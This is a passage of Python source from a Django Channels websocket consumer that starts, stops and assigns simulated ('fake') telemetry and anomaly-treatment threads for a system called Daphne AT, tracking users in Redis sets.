r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
# Check if only simulator thread is alive, then only kill simulator thread
elif global_obj.simulator_threads[2].is_alive():
global_obj.hub_to_simulator_queues[2].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_threads[2].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[2].is_alive():
print('There was an error stopping fake simulator thread three.')
# Unassign anyway
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
# Check if only at thread is alive, then only kill at thread
elif global_obj.simulator_at_threads[2].is_alive():
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_at_threads[2].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[2].is_alive():
print('There was an error stopping fake at thread three.')
# Unassign anyway
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
# Check if both are dead then unassign
else:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
elif r.sismember('fake-telemetry-four', self.channel_name) == 1:
# Check if both simulator and at threads are not initialized
if global_obj.simulator_threads[3] is None and global_obj.simulator_at_threads[3] is None:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
# Check if only simulator thread is not initialized
elif global_obj.simulator_threads[3] is None:
# Check if at thread is alive, then kill that thread
if global_obj.simulator_at_threads[3].is_alive():
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_at_threads[3].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[3].is_alive():
print('There was an error stopping fake at thread four.')
# Unassign anyway
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
# If it is not alive then it is already stopped
else:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
# Check if only at thread is not initialized
elif global_obj.simulator_at_threads[3] is None:
# Check if simulator thread is alive, then kill that thread
if global_obj.simulator_threads[3].is_alive():
global_obj.hub_to_simulator_queues[3].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_threads[3].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[3].is_alive():
print('There was an error stopping fake simulator thread four.')
# unassign anyway
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
# If it is not alive then it is already stopped
else:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
# Check if both have been initialized
else:
# Check if both are alive, then kill both
if global_obj.simulator_threads[3].is_alive() and global_obj.simulator_at_threads[3].is_alive():
global_obj.frontend_to_hub_queue.put({'type': 'stop_fake_telemetry_four'})
# Ensure it gets stopped
global_obj.simulator_threads[3].join(2.0)
if global_obj.simulator_threads[3].is_alive():
print('There was an error stopping fake telemetry thread four.')
global_obj.simulator_at_threads[3].join(2.0)
if global_obj.simulator_at_threads[3].is_alive():
print('There was an error stopping fake at thread four.')
# Unassign anyway
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
# Check if only simulator thread is alive, then only kill simulator thread
elif global_obj.simulator_threads[3].is_alive():
global_obj.hub_to_simulator_queues[3].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_threads[3].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[3].is_alive():
print('There was an error stopping fake simulator thread four.')
# Unassign anyway
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
# Check if only at thread is alive, then only kill at thread
elif global_obj.simulator_at_threads[3].is_alive():
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_at_threads[3].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[3].is_alive():
print('There was an error stopping fake at thread four.')
# Unassign anyway
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
# Check if both are dead then unassign
else:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
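# NOTE: every fake-telemetry branch above ends with the same unassign sequence.
# A minimal helper sketch of that repeated pattern (hypothetical names, not called
# anywhere in this file) would be roughly:
#
#   def _unassign_fake_telemetry(r, set_name, unassign_type, channel_name):
#       r.srem(set_name, channel_name)
#       if r.scard(set_name) != 0:
#           r.delete(set_name)
#       global_obj.frontend_to_hub_queue.put({'type': unassign_type})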
# Remove the user from the all users group
r.srem("all-users", self.channel_name)
if r.sismember("all-users", self.channel_name) == 1:
print(f"Error removing {self.channel_name} from the all users group.")
else:
print(f"Success removing {self.channel_name} from the all users group. There are {r.scard('all-users')} "
f"left in the all channels group. The all users group contains {r.smembers('all-users')}")
if r.scard("all-users") == 0:
# Clear all redis variables if no one is on
r.delete("seclss-group-users")
r.delete("fake-telemetry-one")
r.delete("fake-telemetry-two")
r.delete("fake-telemetry-three")
r.delete("fake-telemetry-four")
r.delete("all-users")
print("Cleared on redis variables.")
# Then call function from base class, and then add the new behavior
super(ATConsumer, self).disconnect(close_code)
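# The disconnect handler above repeatedly applies the same "signal stop, join with
# a timeout, report failure" sequence to each thread. A minimal sketch of that
# pattern (hypothetical helper, not used by this class) would be roughly:
#
#   def _stop_thread(stop_queue, thread, label):
#       stop_queue.put({'type': 'stop'})
#       thread.join(2.0)
#       if thread.is_alive():
#           print(f'There was an error stopping {label}.')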
def receive_json(self, content, **kwargs):
"""
Called when we get a text frame. Channels will JSON-decode the payload
for us and pass it as the first argument.
"""
# First call function from base class
super(ATConsumer, self).receive_json(content, **kwargs)
# Then add new behavior
# key = self.scope['path'].lstrip('api/')
# Get an updated session store
user_info = get_user_information(self.scope['session'], self.scope['user'])
r = redis.Redis()
# Update context to SQL one
if content.get('msg_type') == 'context_add':
for subcontext_name, subcontext in content.get('new_context').items():
for key, value in subcontext.items():
setattr(getattr(user_info, subcontext_name), key, value)
getattr(user_info, subcontext_name).save()
user_info.save()
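# For reference, a 'context_add' message is expected to carry a nested dict of
# subcontext names to field/value pairs, roughly (field names here are
# placeholders and depend on the user information models):
# {
#     'msg_type': 'context_add',
#     'new_context': {
#         'some_subcontext': {'some_field': 'some_value'}
#     }
# }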
elif content.get('type') == 'start_hub_thread':
# If the hub thread is none then it has never been started so start it
if global_obj.hub_thread is None:
# Hub thread initialization
global_obj.hub_thread = threading.Thread(target=hub_routine,
name="Hub Thread",
args=(global_obj.frontend_to_hub_queue,
global_obj.sEclss_to_hub_queue,
global_obj.hera_to_hub_queue,
global_obj.simulator_to_hub_queues[0],
global_obj.simulator_to_hub_queues[1],
global_obj.simulator_to_hub_queues[2],
global_obj.simulator_to_hub_queues[3],
global_obj.hub_to_sEclss_queue,
global_obj.hub_to_hera_queue,
global_obj.hub_to_simulator_queues[0],
global_obj.hub_to_simulator_queues[1],
global_obj.hub_to_simulator_queues[2],
global_obj.hub_to_simulator_queues[3],
global_obj.hub_to_sEclss_at_queue,
global_obj.hub_to_hera_at_queue,
global_obj.hub_to_simulator_at_queues[0],
global_obj.hub_to_simulator_at_queues[1],
global_obj.hub_to_simulator_at_queues[2],
global_obj.hub_to_simulator_at_queues[3],
global_obj.sEclss_at_to_hub_queue,
global_obj.hera_at_to_hub_queue,
global_obj.simulator_at_to_hub_queues[0],
global_obj.simulator_at_to_hub_queues[1],
global_obj.simulator_at_to_hub_queues[2],
global_obj.simulator_at_to_hub_queues[3]
))
global_obj.hub_thread.start()
# Ensure the hub thread started
if global_obj.hub_thread.is_alive():
print("Hub thread started.")
self.send(json.dumps({
'type': 'hub_thread_response',
'content': {'status': 'success',
'message': 'Success starting the hub thread.',
'attempt': content.get('attempt')}
}))
# If it hasn't started then send back an error
else:
self.send(json.dumps({
'type': 'hub_thread_response',
'content': {'status': 'error',
'message': 'Error starting the hub thread.',
'attempt': content.get('attempt')}
}))
# If the hub thread is not None then check to see if it is alive or not
else:
# If it is alive then send back already running
if global_obj.hub_thread.is_alive():
self.send(json.dumps({
'type': 'hub_thread_response',
'content': {'status': 'already_running',
'message': 'The hub thread was already running. This is fine if someone else is '
'using Daphne AT.',
'attempt': content.get('attempt')}
}))
# If it is not alive then reinitialize it and restart it
else:
# Hub thread initialization
global_obj.hub_thread = threading.Thread(target=hub_routine,
name="Hub Thread",
args=(global_obj.frontend_to_hub_queue,
global_obj.sEclss_to_hub_queue,
global_obj.hera_to_hub_queue,
global_obj.simulator_to_hub_queues[0],
global_obj.simulator_to_hub_queues[1],
global_obj.simulator_to_hub_queues[2],
global_obj.simulator_to_hub_queues[3],
global_obj.hub_to_sEclss_queue,
global_obj.hub_to_hera_queue,
global_obj.hub_to_simulator_queues[0],
global_obj.hub_to_simulator_queues[1],
global_obj.hub_to_simulator_queues[2],
global_obj.hub_to_simulator_queues[3],
global_obj.hub_to_sEclss_at_queue,
global_obj.hub_to_hera_at_queue,
global_obj.hub_to_simulator_at_queues[0],
global_obj.hub_to_simulator_at_queues[1],
global_obj.hub_to_simulator_at_queues[2],
global_obj.hub_to_simulator_at_queues[3],
global_obj.sEclss_at_to_hub_queue,
global_obj.hera_at_to_hub_queue,
global_obj.simulator_at_to_hub_queues[0],
global_obj.simulator_at_to_hub_queues[1],
global_obj.simulator_at_to_hub_queues[2],
global_obj.simulator_at_to_hub_queues[3]
))
global_obj.hub_thread.start()
# Ensure the hub thread started
if global_obj.hub_thread.is_alive():
print("Hub thread started.")
self.send(json.dumps({
'type': 'hub_thread_response',
'content': {'status': 'success',
'message': 'Success starting the hub thread.',
'attempt': content.get('attempt')}
}))
# If it hasn't started then send back an error
else:
self.send(json.dumps({
'type': 'hub_thread_response',
'content': {'status': 'error',
'message': 'Error starting the hub thread.',
'attempt': content.get('attempt')}
}))
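# The hub thread is launched twice above with the same long positional argument
# list. A sketch of building that tuple from the queue collections on global_obj
# (illustrative only; the code above passes every queue explicitly) could be:
#
#   hub_args = (global_obj.frontend_to_hub_queue,
#               global_obj.sEclss_to_hub_queue,
#               global_obj.hera_to_hub_queue,
#               *global_obj.simulator_to_hub_queues[:4],
#               global_obj.hub_to_sEclss_queue,
#               global_obj.hub_to_hera_queue,
#               *global_obj.hub_to_simulator_queues[:4],
#               global_obj.hub_to_sEclss_at_queue,
#               global_obj.hub_to_hera_at_queue,
#               *global_obj.hub_to_simulator_at_queues[:4],
#               global_obj.sEclss_at_to_hub_queue,
#               global_obj.hera_at_to_hub_queue,
#               *global_obj.simulator_at_to_hub_queues[:4])
#   global_obj.hub_thread = threading.Thread(target=hub_routine, name="Hub Thread", args=hub_args)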
elif content.get('type') == 'start_fake_telemetry':
# Check if this user is already assigned to a fake telemetry
if r.sismember("fake-telemetry-one", self.channel_name):
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_assigned',
'message': 'This user is already assigned to fake telemetry one.',
'attempt': content.get('attempt')
}
}))
elif r.sismember("fake-telemetry-two", self.channel_name):
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_assigned',
'message': 'This user is already assigned to fake telemetry two.',
'attempt': content.get('attempt')
}
}))
elif r.sismember("fake-telemetry-three", self.channel_name):
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_assigned',
'message': 'This user is already assigned to fake telemetry three.',
'attempt': content.get('attempt')
}
}))
elif r.sismember("fake-telemetry-four", self.channel_name):
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_assigned',
'message': 'This user is already assigned to fake telemetry four.',
'attempt': content.get('attempt')
}
}))
# Check if simulator 1 is not yet assigned to any user
elif r.scard('fake-telemetry-one') == 0:
# Check if simulator at thread 1 has not been initialized, then initialize it
if global_obj.simulator_at_threads[0] is None:
# Anomaly detection thread initialization
global_obj.simulator_at_threads[0] = threading.Thread(target=anomaly_treatment_routine,
name="Fake AT Thread 1",
args=(
global_obj.hub_to_simulator_at_queues[0],
global_obj.simulator_at_to_hub_queues[0],
))
global_obj.simulator_at_threads[0].start()
# If simulator at thread 1 start was successful then proceed to start the telemetry thread
if global_obj.simulator_at_threads[0].is_alive():
print("Fake AT Thread 1 started.")
# Check if simulator thread 1 has not been initialized, then initialize it
if global_obj.simulator_threads[0] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[0] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 1",
args=(
global_obj.simulator_to_hub_queues[
0],
global_obj.hub_to_simulator_queues[0]
))
global_obj.simulator_threads[0].start()
# If simulator thread 1 start was successful then assign it to fake telemetry 1 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[0].is_alive():
print("Fake Telemetry Thread 1 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 1 and Fake AT Thread 1.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 1 but failure to start fake '
'telemetry thread 1. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 1 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[0].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting fake at thread 1 and fake telemetry thread 1 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[0] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 1",
args=(
global_obj.simulator_to_hub_queues[
0],
global_obj.hub_to_simulator_queues[
0]
))
global_obj.simulator_threads[0].start()
# If simulator thread 1 start was successful then assign it to fake telemetry 1 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[0].is_alive():
print("Fake Telemetry Thread 1 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 1 and Fake AT Thread 1.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 1 but failure to start fake '
'telemetry thread 1. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If simulator at thread 1 start was a failure then don't start the fake telemetry thread
# and send error
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting fake at thread 1. Fake telemetry 1 was not started.',
'attempt': content.get('attempt')
}
}))
# Simulator at thread 1 has already been initialized
else:
# Check if alive then handle telemetry feed normally
if global_obj.simulator_at_threads[0].is_alive():
# Check if simulator thread 1 has not been initialized, then initialize it
if global_obj.simulator_threads[0] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[0] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 1",
args=(
global_obj.simulator_to_hub_queues[
0],
global_obj.hub_to_simulator_queues[0]
))
global_obj.simulator_threads[0].start()
# If simulator thread 1 start was successful then assign it to fake telemetry 1 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[0].is_alive():
print("Fake Telemetry Thread 1 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 1 and Fake AT Thread 1 was '
'already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Fake at thread 1 was already running but failure to start fake '
'telemetry thread 1. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 1 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[0].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Fake at thread 1 and fake telemetry thread 1 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[0] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 1",
args=(
global_obj.simulator_to_hub_queues[
0],
global_obj.hub_to_simulator_queues[
0]
))
global_obj.simulator_threads[0].start()
# If simulator thread 1 start was successful then assign it to fake telemetry 1 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[0].is_alive():
print("Fake Telemetry Thread 1 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 1 and Fake AT Thread 1 '
'was already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Fake at thread 1 was already running but failure to start fake '
'telemetry thread 1. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If not alive then reinitialize it and handle telemetry feed normally
else:
# Anomaly detection thread initialization
global_obj.simulator_at_threads[0] = threading.Thread(target=anomaly_treatment_routine,
name="Fake AT Thread 1",
args=(
global_obj.hub_to_simulator_at_queues[
0],
global_obj.simulator_at_to_hub_queues[
0],
))
global_obj.simulator_at_threads[0].start()
# If simulator at thread 1 start was successful then proceed to start the telemetry thread
if global_obj.simulator_at_threads[0].is_alive():
print("Fake AT Thread 1 started.")
# Check if simulator thread 1 has not been initialized, then initialize it
if global_obj.simulator_threads[0] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[0] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 1",
args=(
global_obj.simulator_to_hub_queues[
0],
global_obj.hub_to_simulator_queues[
0]
))
global_obj.simulator_threads[0].start()
# If simulator thread 1 start was successful then assign it to fake telemetry 1 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[0].is_alive():
print("Fake Telemetry Thread 1 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 1 and Fake AT Thread 1.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 1 but failure to start fake '
'telemetry thread 1. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 1 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[0].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting fake at thread 1 and fake telemetry thread 1 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[0] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 1",
args=(
global_obj.simulator_to_hub_queues[
0],
global_obj.hub_to_simulator_queues[
0]
))
global_obj.simulator_threads[0].start()
# If simulator thread 1 start was successful then assign it to fake telemetry 1 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[0].is_alive():
print("Fake Telemetry Thread 1 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_one",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-one', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 1 and Fake AT Thread 1.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 1 but failure to start fake '
'telemetry thread 1. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If simulator at thread 1 start was a failure then don't start the fake telemetry thread
# and send error
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting fake at thread 1. Fake telemetry 1 was not started.',
'attempt': content.get('attempt')
}
}))
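# The fake-telemetry-one branch above and the branches below differ only in the
# simulator index, the redis set name, and the message/type strings. A hypothetical
# parameterized registration step for the success path (illustrative sketch, not
# invoked by this handler) would be roughly:
#
#   def _register_fake_telemetry(self, r, index, set_name, add_type):
#       global_obj.frontend_to_hub_queue.put({'type': add_type,
#                                             'channel_layer': self.channel_layer,
#                                             'channel_name': self.channel_name})
#       r.sadd(set_name, self.channel_name)
#       global_obj.frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
#                                             'channel_name': self.channel_name})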
# Fake telemetry 2 check
elif r.scard('fake-telemetry-two') == 0:
# Check if simulator at thread 2 has not been initialized, then initialize it
if global_obj.simulator_at_threads[1] is None:
# Anomaly detection thread initialization
global_obj.simulator_at_threads[1] = threading.Thread(target=anomaly_treatment_routine,
name="Fake AT Thread 2",
args=(
global_obj.hub_to_simulator_at_queues[1],
global_obj.simulator_at_to_hub_queues[1],
))
global_obj.simulator_at_threads[1].start()
# If simulator at thread 2 start was successful then proceed to start the telemetry thread
if global_obj.simulator_at_threads[1].is_alive():
print("Fake AT Thread 2 started.")
# Check if simulator thread 2 has not been initialized, then initialize it
if global_obj.simulator_threads[1] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[1] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 2",
args=(
global_obj.simulator_to_hub_queues[
1],
global_obj.hub_to_simulator_queues[1]
))
global_obj.simulator_threads[1].start()
# If simulator thread 2 start was successful then assign it to fake telemetry 2 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[1].is_alive():
print("Fake Telemetry Thread 2 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 2 and Fake AT Thread 2.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 2 and send back error message
else:
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 2 but failure to start fake '
'telemetry thread 2. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 2 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[1].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting fake at thread 2 and fake telemetry thread 2 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[1] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 2",
args=(
global_obj.simulator_to_hub_queues[
1],
global_obj.hub_to_simulator_queues[
1]
))
global_obj.simulator_threads[1].start()
# If simulator thread 2 start was successful then assign it to fake telemetry 2 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[1].is_alive():
print("Fake Telemetry Thread 2 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 2 and Fake AT Thread 2.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 2 and send back error message
else:
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 2 but failure to start fake '
'telemetry thread 2. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If simulator at thread 2 start was a failure then don't start the fake telemetry thread
# and send error
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting fake at thread 2. Fake telemetry 2 was not started.',
'attempt': content.get('attempt')
}
}))
# Simulator at thread 2 has already been initialized
else:
# Check if alive then handle telemetry feed normally
if global_obj.simulator_at_threads[1].is_alive():
# Check if simulator thread 2 has not been initialized, then initialize it
if global_obj.simulator_threads[1] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[1] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 2",
args=(
global_obj.simulator_to_hub_queues[
1],
global_obj.hub_to_simulator_queues[1]
))
global_obj.simulator_threads[1].start()
# If simulator thread 2 start was successful then assign it to fake telemetry 2 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[1].is_alive():
print("Fake Telemetry Thread 2 started.")
